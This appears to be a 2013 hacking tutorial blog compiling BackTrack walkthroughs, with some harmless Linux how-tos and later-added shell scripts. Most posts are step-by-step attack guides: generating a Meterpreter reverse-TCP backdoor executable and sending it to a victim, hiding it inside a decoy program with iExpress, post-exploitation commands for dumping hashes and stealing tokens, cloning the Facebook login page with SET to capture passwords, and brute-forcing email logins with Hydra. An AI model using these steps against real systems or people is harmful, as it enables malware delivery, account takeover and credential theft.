Monday, March 11, 2013

How to open blocked websites in 1 step


1. This method can work when you are behind a firewall or filter that blocks the site by its host name:
Type
ping <url>
ping resolves the host name through DNS and prints the IP address. Copy that address and open it in the browser instead of the name. Two caveats: if the filter blocks the IP address as well, this gains nothing, and a server that hosts several sites on one IP (very common) needs the host name in the request to pick the right site, so the bare IP often returns a different site or an error page.
2. This method is used when the URL itself is blocked:
Just type “https://” in place of “http://” in front of the “www”. This only works where the filter inspects plain-text HTTP and the site is reachable over HTTPS; a filter that blocks by IP address or by the server name sent in the TLS handshake still stops it.

meterpreter Commands


Here is a list of some Meterpreter commands used in post-exploitation.

- screengrab
 Take a screenshot of the victim's desktop. It comes from the espia extension, so run use espia first; the built-in screenshot command does the same without it.

- run scriptname
 Run a Meterpreter script; the full list is in the scripts/meterpreter directory of the framework. Newer framework versions replace most of these scripts with post modules.

- sysinfo
 Show the system information of the remote target (computer name, OS, architecture).

- ls
 List the files and folders in the current directory on the target.

- use priv
 Load the priv extension, which adds getsystem (escalate to SYSTEM), hashdump (dump password hashes) and timestomp (alter file timestamps).

- use incognito
 Load the incognito extension for token stealing and impersonation on the target: list_tokens shows the tokens available and impersonate_token takes one over.
 

Dual Boot: BackTrack and Windows


This is the simplest way to install. It assumes that a Windows installation currently takes up the whole disk and that you want to shrink and repartition the disk so BackTrack can be installed alongside Windows.

DON'T FORGET TO BACK UP YOUR WINDOWS INSTALLATION FIRST! Resizing a partition that holds data can go wrong, and there is no undo.

Burn the BackTrack ISO to a DVD or write it to a flash drive, put it in the computer and reboot from it. The system boots to a menu; choose the first (default) option, which drops you at a console prompt. To start the Live KDE desktop, type startx and press Enter.

1. Once in the Live desktop, click on the Install BackTrack icon on the desktop.

Social Engineering


Kevin Mitnick, one of the most famous social engineers in the world, popularized the term “social engineering.”
Social engineering, in the context of security, is understood to mean the art of manipulating people into performing actions or divulging confidential information.
“Albert Einstein once said, “Information is not knowledge.” That is a powerful thought. Just reading this book will not somehow implant this knowledge into your being. Apply the principles, practice what is taught in these pages, and make the information a part of your daily life. When you do that is when you will see this knowledge take effect.”
(Christopher Hadnagy)
The quote is from Hadnagy's Social Engineering: The Art of Human Hacking, the first book to reveal and dissect the technical aspect of many social engineering maneuvers: Download here.

Linux Essentials Manual


The new LPI Linux Essentials exam was launched at LinuxTag this week, and Linup Front released their e-book on Linux Essentials at the same time under a Creative Commons license.

Linux Essentials defines the basic knowledge required to competently use a desktop or mobile device running a Linux operating system.

The Linux Essentials certificate is meant to define the basic knowledge needed to use a Linux computer productively and, through a matching education programme, help young people and adults new to the open source community understand Linux and open source software in the context of the ICT industry.

Linux Essentials is a new certification by the Linux Professional Institute (LPI).

The book covers commands, compressing files, networking, programming languages and much more. Download here.

How to backdoor Windows using Metasploit


Follow these three simple steps and have fun.


1. Open a terminal and type:
msfpayload windows/meterpreter/reverse_tcp LHOST=(YOUR IP) LPORT=(CHOOSE A PORT) X > /root/Desktop/CHOOSE_A_FILE_NAME.exe
The capital X tells msfpayload to write a Windows executable. LHOST is the address the victim's machine will connect back to, so it has to be one the victim can reach.
Now that the payload is built:
2. Start the Metasploit console by typing msfconsole and set up a handler for the same payload, LHOST and LPORT, then run it so it waits for the connection.
3. Now send the file to the victim; as soon as they download and open it, the executable connects back to the handler and you have a Meterpreter shell on the victim's computer.
That's it!
 
**It is important to hide the payload inside another file; a stock msfpayload executable is also flagged by most antivirus products, so expect it to be caught on a protected machine.
Click here to see how to bind a file.

How to bind using iExpress


In Windows:
1. Go to “Start” and hit “Run”.
2. Type “iexpress” and hit “OK”.
3. Make sure “Create new Self Extraction Directive file” is selected, then hit “Next”.
4. Select “Extract files and run an installation command”, then hit “Next”.
5. Choose a package title, or just press the space bar once so the text box is not empty, then hit “Next”.
6. Select “No Prompt”, then hit “Next”.
7. Select “Do not display a license”, then hit “Next”.
8. Hit “Add” in the iexpress window; a file dialog opens. Browse to the executable you want to hide (the post calls it the virus) and hit “Open”.
9. Back in the iexpress window, hit “Add” again and this time browse to the program you want to run after the payload (the decoy the user expects to see). Hit “Open”.
10. With both the payload and the decoy in the list, hit “Next”.
11. In the first drop-down box (“Install Program”) select the payload.
12. In the next drop-down box (“Post Install Command”) select the decoy program, then hit “Next”.
13. Select “Hidden” for the window, then hit “Next”.
14. Select “No message”, then hit “Next”.
15. Hit “Browse”, pick where to save the new bound exe, give it a name and hit “Save”.
16. Tick “Hide File Extracting Progress Animation from User”, then hit “Next”.
17. Select “No restart” and hit “Next”.
18. Select “Don't save” and hit “Next”.
19. Hit “Finish”.
Enjoy your new bound exe. Keep in mind that iexpress only wraps both files in a self-extracting cabinet: the payload is stored inside unchanged, written to disk and run as-is, so anything that flagged the original executable will flag the extracted copy too.

Information Gathering: Email Harvester


Quick tutorial on how to extract email addresses from web sites.
Unlike search engines, email harvesters look only for email addresses. Spammers run them, and every address they find goes into a spam database, so you do not want a harvester to find yours.
To deal with harvesters, show the address as an image so a harvester cannot read it (users then have to type it into their mail client by hand); you can also put the page that carries the address behind a password, “encode” the address with JavaScript or, most commonly, use a contact form instead.
To stop other people harvesting your email, do not post it in public places (forums, websites, etc.) and disable “display email address” on your public profiles.
Now the tutorial:
1. Start the Metasploit console by typing msfconsole, then load the module:
msf > use auxiliary/gather/search_email_collector

2. Set the domain whose addresses you want, then type “run” (or “exploit”) and wait for the results, as shown in the snapshot:
msf auxiliary(search_email_collector) > set DOMAIN globo.com
msf auxiliary(search_email_collector) > run
As you can see, the harvester found 3 addresses at globo.com!
The module does not crawl globo.com itself: it queries Google, Bing and Yahoo for pages that mention the domain and pulls addresses out of the results, so it needs Internet access and only finds addresses that are already indexed.


That's it... now collect as many emails as you can and sell them to spammers! Just kidding...
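To see what a harvester is actually looking for, here is an added example (not the Metasploit module, and not from the original post) that runs the regex scan at the core of any email harvester over a constructed HTML fragment. It also shows why writing an address as “name [at] example [dot] com” is weak protection: one sed substitution puts it back.

```sh
#!/bin/sh
# Added example (not Metasploit's module, not from the original post): the
# regex scan at the core of any email harvester, run over a constructed page.
set -eu

# Constructed HTML: plain addresses, a duplicate, a mailto: link and one
# address "protected" as name [at] domain [dot] tld.
SAMPLE_HTML='<p>Contact <a href="mailto:press@example.com">press@example.com</a>
or sales@example.com. Support: helpdesk [at] example [dot] com</p>
<p>Billing: billing@sub.example.org (the same as sales@example.com)</p>'

# Naive harvester: everything shaped like user@host.tld, de-duplicated.
extract_emails() {
    grep -Eo '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}' | sort -u
}

# Harvester that first undoes "[at]"/"(at)" and "[dot]"/"(dot)" spelling,
# which is why that kind of obfuscation buys almost nothing.
extract_emails_deobfuscated() {
    sed -E 's/[[:space:]]*[[(]at[])][[:space:]]*/@/g; s/[[:space:]]*[[(]dot[])][[:space:]]*/./g' \
        | extract_emails
}

echo '--- naive scan:'
printf '%s\n' "$SAMPLE_HTML" | extract_emails
echo '--- after de-obfuscation:'
printf '%s\n' "$SAMPLE_HTML" | extract_emails_deobfuscated
```

The naive scan finds three distinct addresses and misses the obfuscated one; the second pass finds all four. An image or a contact form, as the post suggests, gives the regex nothing to match.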

QR-Code Generator Attack Vector


QR Code is the trademark for a type of matrix barcode.
With the QR Code Generator in BackTrack's SET you create a code that points to a URL of your choice: your own site, or your IP address hosting a fake page built with another SET attack vector, so the code delivers the victim to that attack.
1. Open the SET toolkit.
2. Choose Social-Engineering Attacks, then option 9 (QRCode Generator Attack Vector).
3. Enter the URL the QR code should open, or your IP with your fake site. Don't forget to write “http://” before your IP.
After that you'll see a message that your QR code has been generated.
Test the code with your own phone before you use it; the code only carries the URL, and the page it points at has to do the rest.

Hacking Email Accounts with Hydra


The purpose of this article is not to show how to hack email accounts but to demonstrate the power of Hydra combined with a strong wordlist.
Hydra is a tool that makes cracking network logins for protocols such as POP3, FTP and Telnet relatively easy. In my example I will be cracking an email account (my own). Hydra runs a dictionary attack, trying each entry of the wordlist in turn, so the password HAS to be in your wordlist for it to succeed. Mail providers also lock accounts or throttle logins after a few failures, so against a real provider a long wordlist mostly produces lockouts.

Wordlist Post

I'll be attacking a POP3 email account, but you can use other protocols, such as:
TELNET, FTP, FIREBIRD, HTTP-GET, HTTP-HEAD, HTTPS-GET, HTTPS-HEAD, HTTP-PROXY, HTTP-PROXY-NTLM, HTTP-FORM-GET, HTTP-FORM-POST, MYSQL, POSTGRES, POP3-NTLM, IMAP, IMAP-NTLM, NCP, NNTP, SMTP-AUTH, SMTP-AUTH-NTLM, SSH2, SNMP, CVS, VNC, POP3, VMWARE AUTH.
 
1. Open Hydra's GUI by typing “xhydra”, or start it from the menu.
2. On the Target tab, enter the target host, the port and the protocol, and check the options as shown below:
3. On the Passwords tab, enter the username (the email account whose password strength you want to check). Tick “Password List” and choose the path to your wordlist, then tick “Try login as password” and “Try empty password”.

Word List – Brute Force


A dictionary attack using a wordlist relies on the fact that most users choose weak passwords. Very common passwords include password, computer, work and most of the popular female names.
A wordlist can be used to attempt a dictionary attack against any system that allows repeated login attempts, such as SSH or POP3. But you already knew that... My word lists:
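The point that the password has to be in the list is easier to act on with a list that already contains the usual variations. The script below is an added example, not from the original post or from any cracking tool: it takes a few base words (constructed for the demo) and writes out each one as typed and capitalised, bare and with a digit, a year or an exclamation mark appended. Real rule sets (John the Ripper's, hashcat's) do the same far more thoroughly.

```sh
#!/bin/sh
# Added example (not from the original post or any cracking tool): expand a
# few base words into the variants people actually type, so the dictionary
# also holds "Password1" and "summer2013!". BASE_WORDS is constructed.
set -eu

BASE_WORDS='password
summer
computer'

# Upper-case the first letter, portably (no bash-only ${w^} syntax).
capitalize() {
    first=$(printf '%s' "$1" | cut -c1 | tr '[:lower:]' '[:upper:]')
    rest=$(printf '%s' "$1" | cut -c2-)
    printf '%s%s' "$first" "$rest"
}

# One word -> 30 candidates: as typed and capitalised, each bare, with a
# single digit, "123", a recent year, or "!" appended.
mutate_word() {
    for base in "$1" "$(capitalize "$1")"; do
        printf '%s\n' "$base"
        for suffix in 0 1 2 3 4 5 6 7 8 9 123 2012 2013; do
            printf '%s%s\n' "$base" "$suffix"
        done
        printf '%s!\n' "$base"
    done
}

# Base words on stdin, expanded and de-duplicated list on stdout.
expand_wordlist() {
    while IFS= read -r word; do
        if [ -n "$word" ]; then mutate_word "$word"; fi
    done | sort -u
}

# Number of candidates the demo list expands to.
wordlist_size() { printf '%s\n' "$BASE_WORDS" | expand_wordlist | wc -l | tr -d ' '; }

OUT="${WORDLIST:-$(mktemp)}"
printf '%s\n' "$BASE_WORDS" | expand_wordlist > "$OUT"
printf '%s candidates written to %s\n' "$(wordlist_size)" "$OUT"
```

Feed the result to Hydra with -P; the “try login as password” and “empty password” boxes in xhydra are the -e s and -e n switches on the command line.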

Social Engineering – SET Toolkit – Facebook Hack


- Social Engineering: Understood to mean the art of manipulating people into performing actions or divulging confidential information.

I'm going to show you how to capture a Facebook login with BackTrack 5: SET clones the Facebook login page, serves the copy from your machine and records what the victim types into it. Just follow the steps.
1. Open a terminal in BackTrack 5 and type cd /pentest/exploits/set (or go through the start menu), then type ./set to open the Social-Engineer Toolkit (SET).
2. Select the 1st option (1 – Social-Engineering Attacks) and hit Enter. Then choose the 2nd option, “Website Attack Vectors” (as shown in the snapshot).
3. Select the 3rd option, “Credential Harvester Attack Method”, and hit Enter.
4. Select the 2nd option, “Site Cloner”, and hit Enter.
5. Enter the URL of the Facebook login page (or of the site you want to target, such as Gmail or MSN), hit Enter, wait for SET to clone the site and hit Enter again; you'll see this message.
6. Open your IP address in a browser (How do I find my IP address?)
7. Type a test email and password to see whether it works.
8. Hit Enter, switch back to the terminal and check that the email and password appear.
Click here to see the video of this tutorial.
Two things to keep in mind: the clone is served over plain HTTP from your IP address, so the browser shows a bare IP instead of facebook.com and no padlock, and the victim has to be talked into ignoring both (that is the social engineering part); and the victim must be able to reach your IP, so a 192.168.x.x address only works against someone on the same network.
- tutorial for educational purposes only

How do I find my IP Address?


Open a new terminal, type ifconfig and hit ENTER.
Your IP address is the “inet addr” value of the interface you are using (eth0 for wired, wlan0 for wireless), as shown circled in red below:


That simple! Note that this is your address on the local network; a victim on the Internet needs your public address instead, and your router has to forward the chosen port to this machine.
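Added example, not from the original post: a small script that pulls the IPv4 addresses out of ifconfig output and says which of them are private. The ifconfig text inside it is constructed; on a real machine pipe the output of ifconfig (or ip addr) into report instead. It exists because the address ifconfig shows is usually a 192.168.x.x one, which only works for the harvester or the reverse shell if the victim is on your own network.

```sh
#!/bin/sh
# Added example (not from the original post): list the IPv4 addresses in
# ifconfig output and classify each as loopback, private or public.
# SAMPLE_IFCONFIG is constructed; on a live machine pipe `ifconfig` in instead.
set -eu

SAMPLE_IFCONFIG='eth0      Link encap:Ethernet  HWaddr 00:0c:29:aa:bb:cc
          inet addr:192.168.1.105  Bcast:192.168.1.255  Mask:255.255.255.0
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
tun0      Link encap:UNSPEC
          inet addr:203.0.113.7  P-t-P:203.0.113.1  Mask:255.255.255.255'

# Every dotted quad that follows "inet addr:" (old ifconfig) or "inet "
# (newer ifconfig and `ip addr`), one per line. "inet6" lines do not match.
list_ipv4() {
    grep -Eo 'inet (addr:)?[0-9]+(\.[0-9]+){3}' | grep -Eo '[0-9]+(\.[0-9]+){3}'
}

# RFC 1918 ranges (10/8, 172.16/12, 192.168/16) are not routed on the
# Internet: a victim outside your LAN can never connect back to them.
classify_ipv4() {
    case "$1" in
        127.*)                                  echo loopback ;;
        10.*|192.168.*)                         echo private ;;
        172.1[6-9].*|172.2[0-9].*|172.3[01].*)  echo private ;;
        *)                                      echo public ;;
    esac
}

# "address class" for every address found on stdin.
report() {
    list_ipv4 | while IFS= read -r ip; do
        printf '%s %s\n' "$ip" "$(classify_ipv4 "$ip")"
    done
}

printf '%s\n' "$SAMPLE_IFCONFIG" | report
```

In the sample only the tun0 address is public; the eth0 address would have to be reached through port forwarding on the router, and the public address of that router is what the victim needs.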

Compressing and Uncompressing files



 
 
This is a simple, quick and easy way of compressing (zipping) and decompressing (extracting) files from the command line.

First open a terminal and go to the folder that holds the file.
Example:
# cd /home/user (go to the directory the file was downloaded to)
# ls (to make sure the package is there)
 
To combine multiple files and/or directories into a single file, use the following command:
  • tar -cvf your_file.tar inputfile1 inputfile2
To extract an archive created by tar:
  • tar -xvf your_file.tar

Extracting gz and bz2
  • bz2 files: tar -jxvf file_name.tar.bz2
  • gz files: tar -zxvf file_name.tar.gz

    *v is verbose mode: tar prints each file name as it processes it. x extracts, c creates, f names the archive, and z or j select gzip or bzip2 compression.
 
To unzip files use:
  • unzip <file_name.zip>
To zip:
  • zip <new_zip_file_name> <file_to_zip>
Example: I want to zip “backtrack.txt”
# zip backtrack.zip backtrack.txt
 
For multiple files:
# zip output_file_name.zip backtrack(1).txt backtrack(2).txt backtrack(3).txt
 
The installation procedure for software that comes in tar.gz and tar.bz2 packages isn't always the same, but usually it's like this:
# tar xvzf package.tar.gz (or tar xvjf package.tar.bz2)
# cd package
# ./configure
# make
# make install
Only do this with a tarball taken from the project's own download page, and compare its checksum or signature with the published one first: ./configure and make run whatever the tarball contains. make install usually needs root (run it with sudo), and when your distribution packages the software, its package is the safer choice because it gets updates.
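The tar commands above, run end to end as an added example (not from the original post) in a scratch directory, with the two checks a practitioner adds before extracting or installing anything downloaded: list the archive and refuse members with absolute paths or “..” in them, and compare the tarball's SHA-256 with the published value before running ./configure. The file tree inside is constructed, and the checksum is computed from it rather than taken from any download page; the zip commands are left out because zip is not installed everywhere.

```sh
#!/bin/sh
# Added example (not from the original post): the tar commands above run end
# to end, plus a safety check on the archive listing and a checksum check.
# The input tree is constructed; the checksum value is computed, not published.
set -eu

WORK=$(mktemp -d)
cd "$WORK"

mkdir -p src/docs
printf 'hello\n' > src/a.txt
printf 'world\n' > src/docs/b.txt

# -c create, -z gzip, -f archive name (same flags as in the post, minus -v).
make_archive() { tar -czf "$1" src; }

# A member name that starts with "/" or contains ".." would be written outside
# the directory you extract into. Reads a `tar -t` listing on stdin.
listing_is_safe() { ! grep -Eq '(^/|(^|/)\.\.(/|$))'; }
archive_is_safe() { tar -tzf "$1" | listing_is_safe; }

# Extract into a separate directory (-C) and compare every file with the original.
extract_and_verify() {
    mkdir -p "$2"
    tar -xzf "$1" -C "$2"
    cmp -s src/a.txt "$2/src/a.txt" && cmp -s src/docs/b.txt "$2/src/docs/b.txt"
}

# Before ./configure && make && make install on a downloaded tarball, compare
# its SHA-256 with the value the project publishes next to the download.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}
checksum_matches() { [ "$(sha256_of "$1")" = "$2" ]; }

make_archive pkg.tar.gz
tar -tzf pkg.tar.gz                      # look before you extract
printf 'sha256: %s\n' "$(sha256_of pkg.tar.gz)"
if archive_is_safe pkg.tar.gz; then
    extract_and_verify pkg.tar.gz out && echo 'extracted and verified'
else
    echo 'refusing to extract: unsafe member names' >&2
fi
```

The listing check is the one that matters with archives from strangers: a member named /etc/cron.d/x or ../../.bashrc is written where its name says, not under the directory you are in, unless tar or you refuse it.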
 
If you have any doubts, just ask.